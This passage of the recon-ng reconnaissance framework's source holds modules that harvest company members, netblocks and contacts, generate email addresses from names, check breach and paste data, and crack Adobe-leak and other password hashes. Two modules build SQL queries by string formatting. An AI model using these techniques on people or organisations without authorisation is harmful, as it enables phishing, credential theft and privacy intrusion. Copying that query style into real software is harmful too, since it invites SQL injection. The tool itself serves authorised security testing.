�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/companies-multi/������������������������������������0000775�0000000�0000000�00000000000�13122657244�0024040�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/companies-multi/github_miner.py���������������������0000664�0000000�0000000�00000003103�13122657244�0027063�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from urllib import quote_plus class Module(BaseModule): meta = { 'name': 'Github Resource Miner', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Uses the Github API to enumerate repositories and member profiles associated with a company search string. Updates the respective tables with the results.', 'required_keys': ['github_api'], 'query': 'SELECT DISTINCT company FROM companies WHERE company IS NOT NULL', } def module_run(self, companies): for company in companies: self.heading(company, level=0) # enumerate members members = self.query_github_api('/orgs/%s/members' % (quote_plus(company))) for member in members: data = { 'username': member['login'], 'url': member['html_url'], 'notes': company, 'resource': 'Github', 'category': 'coding', } self.add_profiles(**data) # enumerate repositories repos = self.query_github_api('/orgs/%s/repos' % (quote_plus(company))) for repo in repos: data = { 'name': repo['name'], 'owner': repo['owner']['login'], 'description': repo['description'], 'url': repo['html_url'], 'resource': 'Github', 'category': 'repo', } self.add_repositories(**data) �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/companies-multi/whois_miner.py����������������������0000664�0000000�0000000�00000011740�13122657244�0026740�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.utils import netblock from urlparse import urlparse import urllib class Module(BaseModule): meta = { 'name': 'Whois Data Miner', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Uses the ARIN Whois RWS to harvest companies, locations, netblocks, and contacts associated with the given company search string. Updates the respective tables with the results.', 'comments': ( 'Wildcard searches are allowed using the "*" character.', 'Validate results of the SEARCH string with these URLs:', '\thttp://whois.arin.net/rest/orgs;name=<SEARCH>', '\thttp://whois.arin.net/rest/customers;name=<SEARCH>', ), 'query': 'SELECT DISTINCT company FROM companies WHERE company IS NOT NULL', } def module_run(self, searches): headers = {'Accept': 'application/json'} for search in searches: for rtype in ('org', 'customer'): url = 'http://whois.arin.net/rest/%ss;name=%s' % (rtype, urllib.quote(search)) entities = self._request(url, headers, rtype+'s', rtype+'Ref') for entity in entities: self.heading(entity['@name'], level=0) url = entity['$'] resp = self.request(url, headers=headers) # add company self.add_companies(company=entity['@name'], description=rtype) # add location location = WhoisLocation(resp.json[rtype]) self.add_locations(street_address=location.address) # add netblocks url = 'http://whois.arin.net/rest/%s/%s/nets' % (rtype, entity['@handle']) nets = self._request(url, headers, 'nets', 'netRef') for net in nets: try: begin = netblock.strtoip(net['@startAddress']) end = netblock.strtoip(net['@endAddress']) blocks = netblock.lhcidrs(begin, end) except ValueError: self.alert('IPv6 ranges not supported: %s-%s' % (net['@startAddress'], net['@endAddress'])) continue for block in blocks: ip = netblock.iptostr(block[0]) cidr = '%s/%s' % (ip, str(block[1])) self.add_netblocks(netblock=cidr) # add contacts url = 'http://whois.arin.net/rest/%s/%s/pocs' % (rtype, entity['@handle']) pocLinks = self._request(url, headers, 'pocs', 'pocLinkRef') for pocLink in pocLinks: url = pocLink['$'] resp = self.request(url, headers=headers) poc = resp.json['poc'] emails = _enum_ref(poc['emails']['email']) for email in emails: fname = poc['firstName']['$'] if 'firstName' in poc else None lname = poc['lastName']['$'] name = ' '.join([x for x in [fname, lname] if x]) email = email['$'] title = 'Whois contact (%s)' % (pocLink['@description']) location = WhoisLocation(poc) self.add_contacts(first_name=fname, last_name=lname, email=email, title=title, region=location.region, country=location.country) def _request(self, url, headers, grp, ref): self.verbose('URL: %s' % url) resp = self.request(url, headers=headers) strs = [ 'No related resources were found for the handle provided.', 'Your search did not yield any results.' ] if any(x in resp.text for x in strs) or ref not in resp.json[grp]: self.output('No %s found.' % (grp.upper())) return [] return _enum_ref(resp.json[grp][ref]) def _enum_ref(ref): if type(ref) == list: objs = [x for x in ref] else: objs = [ref] return objs class WhoisLocation(object): def __init__(self, obj): self.street_address = _enum_ref(obj['streetAddress']['line'])[-1]['$'].title() if 'streetAddress' in obj else None self.city = obj['city']['$'].title() if 'city' in obj else None self.state = obj['iso3166-2']['$'].upper() if 'iso3166-2' in obj else None self.postal_code = obj['postalCode']['$'] if 'postalCode' in obj else None self.country = obj['iso3166-1']['name']['$'].title() if 'iso3166-1' in obj else None self.state_zip = ' '.join([e for e in (self.state, self.postal_code) if e]).strip() self.region = ', '.join([e for e in (self.city, self.state_zip) if e]).strip() self.address = ', '.join(e for e in (self.street_address, self.region, self.country) if e).strip() ��������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/contacts-contacts/����������������������������������0000775�0000000�0000000�00000000000�13122657244�0024364�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/contacts-contacts/mailtester.py���������������������0000664�0000000�0000000�00000002720�13122657244�0027110�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from lxml.html import fromstring class Module(BaseModule): meta = { 'name': 'MailTester Email Validator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Leverages MailTester.com to validate email addresses.', 'query': 'SELECT DISTINCT email FROM contacts WHERE email IS NOT NULL', 'options': ( ('remove', False, True, 'remove invalid email addresses'), ), } def module_run(self, emails): url = 'http://www.mailtester.com/testmail.php' error = 'Too many requests from the same IP address.' payload = {'lang':'en'} for email in emails: payload['email'] = email resp = self.request(url, method='POST', payload=payload) if error in resp.text: self.error(error) break tree = fromstring(resp.text) # clean up problematic HTML for debian based distros tree.forms[0].getparent().remove(tree.forms[0]) msg_list = tree.xpath('//table[last()]/tr[last()]/td[last()]/text()') msg = ' '.join([x.strip() for x in msg_list]) output = self.alert if 'is valid' in msg else self.verbose output('%s => %s' % (email, msg)) if 'does not exist' in msg: self.query('UPDATE contacts SET email=NULL where email=?', (email,)) self.verbose('%s removed.' % (email)) ������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/contacts-contacts/mangle.py�������������������������0000664�0000000�0000000�00000004760�13122657244�0026210�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import re class Module(BaseModule): meta = { 'name': 'Contact Name Mangler', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Applies a mangle pattern to all of the contacts stored in the database, creating email addresses or usernames for each harvested contact. Updates the \'contacts\' table with the results.', 'comments': ( 'Pattern options: <fi>,<fn>,<mi>,<mn>,<li>,<ln>', 'Example: <fi>.<ln> => j.doe@domain.com', 'Note: Omit the \'domain\' option to create usernames', ), 'query': 'SELECT rowid, first_name, middle_name, last_name, email FROM contacts ORDER BY first_name', 'options': ( ('domain', None, False, 'target email domain'), ('pattern', '<fn>.<ln>', True, 'pattern applied to mangle first and last name'), ('substitute', '-', True, 'character to substitute for invalid email address characters'), ('max-length', 30, True, 'maximum length of email address prefix or username'), ('overwrite', False, True, 'overwrite existing email addresses'), ), } def module_run(self, contacts): for contact in contacts: if not self.options['overwrite'] and contact[4] is not None: continue row = contact[0] fname = contact[1] mname = contact[2] lname = contact[3] email = self.options['pattern'] sub_pattern = '[\s]' substitute = self.options['substitute'] items = {'<fn>': '', '<fi>': '', '<mn>': '', '<mi>': '', '<ln>': '', '<li>': ''} if fname: items['<fn>'] = re.sub(sub_pattern, substitute, fname.lower()) items['<fi>'] = fname[:1].lower() if mname: items['<mn>'] = re.sub(sub_pattern, substitute, mname.lower()) items['<mi>'] = mname[:1].lower() if lname: items['<ln>'] = re.sub(sub_pattern, substitute, lname.lower()) items['<li>'] = lname[:1].lower() for item in items: email = email.replace(item, items[item]) email = email[:self.options['max-length']] domain = self.options['domain'] if domain: email = '%s@%s' % (email, domain) self.output('%s %s => %s' % (fname, lname, email)) self.query('UPDATE contacts SET email=? WHERE rowid=?', (email, row)) ����������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/contacts-contacts/unmangle.py�����������������������0000664�0000000�0000000�00000007071�13122657244�0026551�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import re from string import capwords from sre_constants import error as RegexError class Module(BaseModule): patterns = { '<fi><ln>': '(?P<first_name>.)(?P<last_name>.*)', '<ln><fi>': '(?P<last_name>.*)(?P<first_name>.)', '<ln><fi><mi>': '(?P<last_name>.*)(?P<first_name>.)(?P<middle_name>.)', '<fn>.<ln>': '(?P<first_name>.*)\.(?P<last_name>.*)', '<fn>-<ln>': '(?P<first_name>.*)-(?P<last_name>.*)', '<fn>_<ln>': '(?P<first_name>.*)_(?P<last_name>.*)', '<fn>': '(?P<first_name>.*)', '<ln>': '(?P<last_name>.*)', } meta = { 'name': 'Contact Name Unmangler', 'author': 'Ethan Robish (@EthanRobish)', 'description': 'Applies a regex or unmangle pattern to all of the contacts stored in the database, pulling out the individual name components. Updates the \'contacts\' table with the results.', 'comments': ( 'Pattern can be either a regex or a pattern.', 'The available patterns are:', '\t' + ', '.join(patterns.keys()), 'A regex must capture the values using these named capture groups:', '\t(?P<first_name>) (?P<middle_name>) (?P<last_name>)', 'A regex syntax cheatsheet and troubleshooter can be found here:', '\thttp://pythex.org/ or http://www.pyregex.com/', ), 'query': 'SELECT rowid, first_name, middle_name, last_name, email FROM contacts WHERE email IS NOT NULL', 'options': ( ('pattern', '<fn>.<ln>', True, 'pattern applied to email'), ('overwrite', False, True, 'if set to true will update existing contact entry, otherwise it will create a new entry'), ), } def module_run(self, contacts): try: regex = self.patterns[self.options['pattern']] except KeyError: self.verbose('Pre-defined pattern not found. Switching to raw regex mode.') regex = self.options['pattern'] try: pattern = re.compile(regex) except RegexError: self.error('Invalid regex specified. Please check your syntax and the resources listed in "show info"') return for contact in contacts: rowid = contact[0] email = contact[4] names = ('first_name', 'middle_name', 'last_name') contact = dict(zip(names, contact[1:4])) contact_changed = False username = email.split('@')[0] result = pattern.search(username) if result is None: self.verbose('%s did not match the pattern. Skipping.' % email) continue for name in contact: # Update the existing contact only when the current name value is empty or the user specifies to overwrite # Possibly consider changing the merge strategy here to whichever data is longer if not contact[name] or self.options['overwrite']: try: contact[name] = capwords(result.group(name)) contact_changed = True except IndexError: # The name was not captured by the regex pass # Only do a database query if the contact was actually updated if contact_changed: values = [contact[name] for name in names] + [rowid] self.query('UPDATE contacts SET %s=?,%s=?,%s=? WHERE rowid=?' % names, values) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/contacts-credentials/�������������������������������0000775�0000000�0000000�00000000000�13122657244�0025043�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/contacts-credentials/hibp_breach.py�����������������0000664�0000000�0000000�00000002617�13122657244�0027651�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import time import urllib class Module(BaseModule): meta = { 'name': 'Have I been pwned? Breach Search', 'author': 'Tim Tomes (@LaNMaSteR53) & Tyler Halfpop (@tylerhalfpop)', 'description': 'Leverages the haveibeenpwned.com API to determine if email addresses are associated with breached credentials. Adds compromised email addresses to the \'credentials\' table.', 'comments': ( 'The API is rate limited to 1 request per 1.5 seconds.', ), 'query': 'SELECT DISTINCT email FROM contacts WHERE email IS NOT NULL', } def module_run(self, accounts): # retrieve status base_url = 'https://haveibeenpwned.com/api/v2/%s/%s' endpoint = 'breachedaccount' for account in accounts: resp = self.request(base_url % (endpoint, urllib.quote(account))) rcode = resp.status_code if rcode == 404: self.verbose('%s => Not Found.' % (account)) elif rcode == 400: self.error('%s => Bad Request.' % (account)) continue else: for breach in resp.json: self.alert('%s => Breach found! Seen in the %s breach that occurred on %s.' % (account, breach['Title'], breach['BreachDate'])) self.add_credentials(account) time.sleep(1.6) �����������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/contacts-credentials/hibp_paste.py������������������0000664�0000000�0000000�00000006254�13122657244�0027542�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import os import time import urllib class Module(BaseModule): meta = { 'name': 'Have I been pwned? Paste Search', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Leverages the haveibeenpwned.com API to determine if email addresses have been published to various paste sites. Adds compromised email addresses to the \'credentials\' table.', 'comments': ( 'Paste sites supported: Pastebin, Pastie, Slexy, Ghostbin, QuickLeak, JustPaste, AdHocUrl, and OptOut.' 'The HIBP API is rate limited to 1 request per 1.5 seconds.', ), 'query': 'SELECT DISTINCT email FROM contacts WHERE email IS NOT NULL', 'options': ( ('download', True, True, 'download pastes'), ), } def module_run(self, accounts): # check back often for new paste sources sites = { 'Pastebin': 'http://pastebin.com/raw.php?i=%s', 'Pastie': 'http://pastie.org/pastes/%s/text', 'Slexy': 'http://slexy.org/raw/%s', 'Ghostbin': 'https://ghostbin.com/paste/%s/raw', 'QuickLeak': 'http://www.quickleak.ir/%s', 'JustPaste': 'https://justpaste.it/%s', 'AdHocUrl': '%s', } # retrieve status base_url = 'https://haveibeenpwned.com/api/v2/%s/%s' endpoint = 'pasteaccount' for account in accounts: resp = self.request(base_url % (endpoint, urllib.quote(account))) rcode = resp.status_code if rcode == 404: self.verbose('%s => Not Found.' % (account)) elif rcode == 400: self.error('%s => Bad Request.' % (account)) continue else: for paste in resp.json: download = False fileurl = paste['Id'] if paste['Source'] in sites: fileurl = sites[paste['Source']] % (paste['Id']) download = self.options['download'] elif self.options['download'] == True: self.alert('Download not available for %s pastes.' % (paste['Source'])) self.alert('%s => Paste found! Seen in a %s on %s (%s).' % (account, paste['Source'], paste['Date'], fileurl)) if download == True: resp = self.request(fileurl) if resp.status_code == 200: filepath = '%s/%s.txt' % (self.workspace, _safe_file_name(fileurl)) if not os.path.exists(filepath): dl = open(filepath, 'w') dl.write(resp.text.encode(resp.encoding) if resp.encoding else resp.text) dl.close() self.verbose('Paste stored at \'%s\'.' % (filepath)) else: self.alert('Paste could not be downloaded (%s).' % (fileurl)) self.add_credentials(account) time.sleep(1.6) def _safe_file_name(s): return "".join(c for c in s if c.isalnum()).rstrip() ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/contacts-domains/�����������������������������������0000775�0000000�0000000�00000000000�13122657244�0024200�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/contacts-domains/migrate_contacts.py����������������0000664�0000000�0000000�00000002111�13122657244�0030073�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import os import re class Module(BaseModule): meta = { 'name': 'Contacts to Domains Data Migrator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Adds a new domain for all the hostnames associated with email addresses stored in the \'contacts\' table.', 'comments': ( 'This modules considers that everything after the first element could contain other hosts besides the current. Therefore, hosts > 2 domains deep will create domains > 2 elements in length.', ), 'query': 'SELECT DISTINCT email FROM contacts WHERE email IS NOT NULL', } def module_run(self, emails): # extract the host portion of each email address hosts = [x.split('@')[1] for x in emails] with open(os.path.join(self.data_path, 'suffixes.txt')) as f: suffixes = [line.strip().lower() for line in f if len(line)>0 and line[0] is not '#'] domains = self.hosts_to_domains(hosts, suffixes) for domain in domains: self.add_domains(domain=domain) �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/contacts-profiles/����������������������������������0000775�0000000�0000000�00000000000�13122657244�0024371�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/contacts-profiles/fullcontact.py��������������������0000664�0000000�0000000�00000007327�13122657244�0027272�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import time class Module(BaseModule): meta = { 'name': 'FullContact Contact Enumerator', 'author': 'Quentin Kaiser (@qkaiser, contact[at]quentinkaiser.be) and Tim Tomes (@LaNMaSteR53)', 'description': 'Harvests contact information and profiles from the fullcontact.com API using email addresses as input. Updates the \'contacts\' and \'profiles\' tables with the results.', 'required_keys': ['fullcontact_api'], 'query': 'SELECT DISTINCT email FROM contacts WHERE email IS NOT NULL', } def module_run(self, emails): api_key = self.keys.get('fullcontact_api') base_url = 'https://api.fullcontact.com/v2/person.json' while emails: email = emails.pop(0) payload = {'email':email, 'apiKey':api_key} resp = self.request(base_url, payload=payload) if resp.status_code == 200: # parse contact information if 'contactInfo' in resp.json: try: first_name = resp.json['contactInfo']['givenName'] last_name = resp.json['contactInfo']['familyName'] middle_name = None except KeyError: first_name, middle_name, last_name = self.parse_name(resp.json['contactInfo']['fullName']) name = ' '.join([x for x in (first_name, middle_name, last_name) if x]) self.alert('%s - %s' % (name, email)) # parse company information for title title = None if 'organizations' in resp.json: for occupation in resp.json['organizations']: if 'current' in occupation and occupation['current']: if 'title' in occupation: title = '%s at %s' % (occupation['title'], occupation['name']) else: title = 'Employee at %s' % occupation['name'] self.output(title) # parse demographics for region region = None if 'demographics' in resp.json and 'locationGeneral' in resp.json['demographics']: region = resp.json['demographics']['locationGeneral'] self.output(region) self.add_contacts(first_name=first_name, middle_name=middle_name, last_name=last_name, title=title, email=email, region=region) # parse profile information if 'socialProfiles' in resp.json: for profile in resp.json['socialProfiles']: # set the username to 'username' or 'id' and default to email if they are unknown username = email for key in ['username', 'id']: if key in profile: username = profile[key] break resource = profile['typeName'] url = profile['url'] self.add_profiles(username=username, url=url, resource=resource, category='social') self.output('Confidence: %d%%' % (resp.json['likelihood']*100,)) elif resp.status_code == 202: # add emails queued by fullcontact back to the list emails.append(email) self.output('%s - Queued for search.' % email) else: self.output('%s - %s' % (email, resp.json['message'])) # 60 requests per minute api rate limit time.sleep(1) ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/credentials-credentials/����������������������������0000775�0000000�0000000�00000000000�13122657244�0025522�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/credentials-credentials/adobe.py��������������������0000664�0000000�0000000�00000007401�13122657244�0027150�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import os import re import json class Module(BaseModule): meta = { 'name': 'Adobe Hash Cracker', 'author': 'Ethan Robish (@EthanRobish) and Tim Tomes (@LaNMaSteR53)', 'description': 'Decrypts hashes leaked from the 2013 Adobe breach. First, the module cross references the leak ID to identify Adobe hashes in the \'password\' column of the \'creds\' table, moves the Adobe hashes to the \'hash\' column, and changes the \'type\' to \'Adobe\'. Second, the module attempts to crack the hashes by comparing the ciphertext\'s decoded cipher blocks to a local block lookup table (BLOCK_DB) of known cipher block values. Finally, the module updates the \'creds\' table with the results based on the level of success.', 'comments': ( 'Hash types supported: Adobe\'s base64 format', 'Hash database from: http://stricture-group.com/files/adobe-top100.txt', 'A completely padded password indicates that the exact length is known.', ), 'query': 'SELECT DISTINCT hash FROM credentials WHERE hash IS NOT NULL AND password IS NULL AND type IS \'Adobe\'', 'options': ( ('block_db', os.path.join(BaseModule.data_path, 'adobe_blocks.json'), True, 'JSON file containing known Adobe cipher blocks and plaintext'), ), } def module_pre(self): adobe_leak_ids = ['26830509422781c65919cba69f45d889', 'bfc06ec52282cafa657d46b424f7e5fa'] # move Adobe leaked hashes from the passwords column to the hashes column and set the hashtype to Adobe if self.options['source'] == 'default': self.verbose('Checking for Adobe hashes and updating the database accordingly...') for adobe_leak_id in adobe_leak_ids: self.query('UPDATE credentials SET hash=password, password=NULL, type=? WHERE hash IS NULL AND leak IS ?', ('Adobe', adobe_leak_id)) def module_run(self, hashes): # create block lookup table with open(self.options['block_db']) as db_file: block_db = json.load(db_file) # decrypt the hashes for hashstr in hashes: # attempt to decrypt the hash using the block lookup table # decode the hash into a string of hex, ciphertext hexstr = ''.join([hex(ord(c))[2:].zfill(2) for c in hashstr.decode('base64')]) # break up the ciphertext into 8 byte blocks blocks = [hexstr[i:i+16] for i in range(0, len(hexstr), 16)] plaintext = '' partial = False padded = False # reverse known cipher blocks for block in blocks: # check the block lookup table if block in block_db: plaintext += block_db[block] # flag as a partial crack partial = True # pad the plaintext for unknown blocks else: plaintext += '*'*8 # flag as padded plaintext padded = True # output the result based on the level of success # partial crack if partial and padded: self.output('%s => %s' % (hashstr, plaintext)) # full crack elif partial and not padded: self.alert('%s => %s' % (hashstr, plaintext)) # failed crack else: self.verbose('Value not found for hash: %s' % (hashstr)) continue # add the cracked/partially cracked hash to the database # must reset the hashtype in order to compensate for all sources of input self.query('UPDATE credentials SET password=?, type=? WHERE hash=?', (plaintext, 'Adobe', hashstr)) ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/credentials-credentials/bozocrack.py����������������0000664�0000000�0000000�00000004145�13122657244�0030055�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import hashlib import random import time class Module(BaseModule): meta = { 'name': 'PyBozoCrack Hash Lookup', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Searches Google for the value of a hash and tests for a match by hashing every word in the resulting page using all hashing algorithms supported by the \'hashlib\' library. Updates the \'credentials\' table with the positive results.', 'comments': ( 'Inspired by the PyBozoCrack script: https://github.com/ikkebr/PyBozoCrack', ), 'query': 'SELECT DISTINCT hash FROM credentials WHERE hash IS NOT NULL AND password IS NULL AND type IS NOT \'Adobe\'', } def module_run(self, hashes): url = 'http://www.google.com/search' for hashstr in hashes: payload = {'q': hashstr} resp = self.request(url, payload=payload, redirect=False) if resp.status_code != 200: if resp.status_code == 302: self.error('You\'ve been temporarily banned by Google for violating the terms of service.') else: self.error('Google has encountered an error.') break #re.sub('[\.:?]', ' ', resp.text).split() wordlist = set(resp.raw.replace('.', ' ').replace(':', ' ').replace('?', '').split(' ')) plaintext, hashtype = crack(hashstr, wordlist) if plaintext: self.alert('%s (%s) => %s' % (hashstr, hashtype, plaintext)) self.query('UPDATE credentials SET password=\'%s\', type=\'%s\' WHERE hash=\'%s\'' % (plaintext, hashtype, hashstr)) else: self.verbose('Value not found for hash: %s' % (hashstr)) # sleep to avoid lock-out time.sleep(random.randint(3,5)) def crack(hashstr, wordlist): for word in wordlist: for hashtype in hashlib.algorithms: func = getattr(hashlib, hashtype) if func(word).hexdigest().lower() == hashstr.lower(): return word, hashtype return None, None ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/credentials-credentials/hashes_org.py���������������0000664�0000000�0000000�00000003405�13122657244�0030220�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import StringIO import time import xml.etree.ElementTree class Module(BaseModule): meta = { 'name': 'Hashes.org Hash Lookup', 'author': 'Tim Tomes (@LaNMaSteR53) and Mike Lisi (@MikeCodesThings)', 'description': 'Uses the Hashes.org API to perform a reverse hash lookup. Updates the \'credentials\' table with the positive results.', 'required_keys': ['hashes_api'], 'comments': ( 'Hash types supported: MD5, MD4, NTLM, LM, DOUBLEMD5, TRIPLEMD5, MD5SHA1, SHA1, MYSQL5, SHA1MD5, DOUBLESHA1, RIPEMD160', ), 'query': 'SELECT DISTINCT hash FROM credentials WHERE hash IS NOT NULL AND password IS NULL AND type IS NOT \'Adobe\'', } def module_run(self, hashes): api_key = self.keys.get('hashes_api') url = 'https://hashes.org/api.php' payload = {'act':'REQUEST', 'key':api_key} for hashstr in hashes: payload['hash'] = hashstr # 20 requests per minute time.sleep(3) resp = self.request(url, payload=payload) jsonobj = resp.json if 'ERROR' in jsonobj: self.verbose('%s => %s' % (hashstr, jsonobj['ERROR'].lower())) elif jsonobj['REQUEST'] != 'FOUND': self.verbose('%s => %s' % (hashstr, jsonobj['REQUEST'].lower())) else: # hashes.org converts the hash to lowercase plaintext = jsonobj[hashstr.lower()]['plain'] hashtype = jsonobj[hashstr.lower()]['algorithm'] self.alert('%s (%s) => %s' % (hashstr, hashtype, plaintext)) self.query('UPDATE credentials SET password=\'%s\', type=\'%s\' WHERE hash=\'%s\'' % (plaintext, hashtype, hashstr)) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-contacts/�����������������������������������0000775�0000000�0000000�00000000000�13122657244�0024200�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-contacts/metacrawler.py���������������������0000664�0000000�0000000�00000005756�13122657244�0027075�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.mixins.search import GoogleWebMixin import recon.utils.parsers as parsers import itertools # to do: # extract email addresses from text # add info to database class Module(BaseModule, GoogleWebMixin): meta = { 'name': 'Meta Data Extractor', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Searches for files associated with the provided domain(s) and extracts any contact related metadata.', 'comments': ( 'Currently supports doc, docx, xls, xlsx, ppt, pptx, and pdf file types.', ), 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', 'options': ( ('extract', False, True, 'extract metadata from discovered files'), ), } def module_run(self, domains): exts = { 'ole': ['doc', 'xls', 'ppt'], 'ooxml': ['docx', 'xlsx', 'pptx'], 'pdf': ['pdf'], } search = 'site:%s ' + ' OR '.join(['filetype:%s' % (ext) for ext in list(itertools.chain.from_iterable(exts.values()))]) for domain in domains: self.heading(domain, level=0) results = self.search_google_web(search % domain) for result in results: self.output(result) # metadata extraction if self.options['extract']: # parse the extension of the discovered file ext = result.split('.')[-1] # search for the extension in the extensions dictionary # the extensions dictionary key indicates the file type for key in exts: if ext in exts[key]: # check to see if a parser exists for the file type if hasattr(parsers, key+'_parser'): try: func = getattr(parsers, key + '_parser') resp = self.request(result) # validate that the url resulted in a file if resp.headers['content-type'].startswith('application'): meta = func(resp.raw) # display the extracted metadata for key in meta: if meta[key]: self.alert('%s: %s' % (key.title(), meta[key])) else: self.error('Resource not a valid file.') except Exception: self.print_exception() else: self.alert('No parser available for file type: %s' % ext) break self.alert('%d files found on \'%s\'.' % (len(results), domain)) ������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-contacts/pgp_search.py����������������������0000664�0000000�0000000�00000003614�13122657244�0026671�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import re class Module(BaseModule): meta = { 'name': 'PGP Key Owner Lookup', 'author': 'Robert Frost (@frosty_1313, frosty[at]unluckyfrosty.net)', 'description': 'Searches the MIT public PGP key server for email addresses of the given domain. Updates the \'contacts\' table with the results.', 'comments': ( 'Inspiration from theHarvester.py by Christan Martorella: cmarorella[at]edge-seecurity.com', ), 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): url = 'http://pgp.mit.edu/pks/lookup' for domain in domains: self.heading(domain, level=0) payload= {'search' : domain} resp = self.request(url, payload=payload) # split the response into the relevant lines lines = [x.strip() for x in re.split('[\n<>]', resp.text) if domain in x] results = [] for line in lines: # remove parenthesized items line = re.sub('\s*\(.*\)\s*', '', line) # parse out name and email address match = re.search('^(.*)<(.*)>$', line) if match: # clean up and append the parsed elements results.append(tuple([x.strip() for x in 